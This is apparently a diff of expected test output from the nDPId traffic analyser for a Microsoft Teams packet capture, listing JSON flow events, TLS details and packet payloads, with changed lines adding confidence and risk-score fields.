-00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01138{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}}
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01386{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
+00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01164{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}}
+00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01492{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
 00352{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":64,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1587041676611,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
 00163{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":64,"source":"teams.pcap","alias":"nDPId-test","layer_type":38}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676612,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041676612,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041676612,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4fAqAEGKH4JBex2AbukS07pAAAAALAC\/\/+ZfQAAAgQFtAEDAwUBAQgKMISYYwAAAAAEAgAA"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1587041676642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041676642,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8LqNAAG0G6+cofgkFwKgBBgG77HaiQxrbpEtO6qASIAC6gQAAAgQFoAEDAwgEAggKVQC94TCEmGM="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1587041676642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041676642,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5PAqAEGKH4JBex2AbukS07qokMa3IAQEAn5EwAAAQEICjCEmIFVAL3h"}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677042,"flow_last_seen":1587041677042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041677042,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1587041677042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041677042,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex3AbvbPWM6AAAAALAC\/\/\/8iwAAAgQFtAEDAwUBAQgKMISaAAAAAAAEAgAA"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1587041677088,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8FwhAAGwGtHI0ck0hwKgBBgG77Hf6fNLR2z1jO6ASIACfvwAAAgQFoAEDAwgEAggKYRMfbzCEmgA="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041677088,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex3AbvbPWM7+nzS0oAQEAneQwAAAQEICjCEmixhEx9v"}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01388{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
+00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01494{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677243,"flow_last_seen":1587041677243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1587041677243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1587041677243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1587041677243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx4Abt\/TkvVAAAAALAC\/\/\/5uQAAAgQFtAEDAwUBAQgKMISawwAAAAAEAgAA"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1587041677255,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0wUlAAHUGi9Y0ccKEwKgBBgG77Hiki1UTf05L1oAS\/\/8DeQAAAgQFoAEDAwgBAQQC"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041677255,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx4Abt\/TkvWpItVFFAQIAAkOAAA"}
-00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01139{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}}
+00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1587041677380,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGPCzAqAEGlZqnW+SlAbsZTPC8DAoX91AUECaMmwAA"}
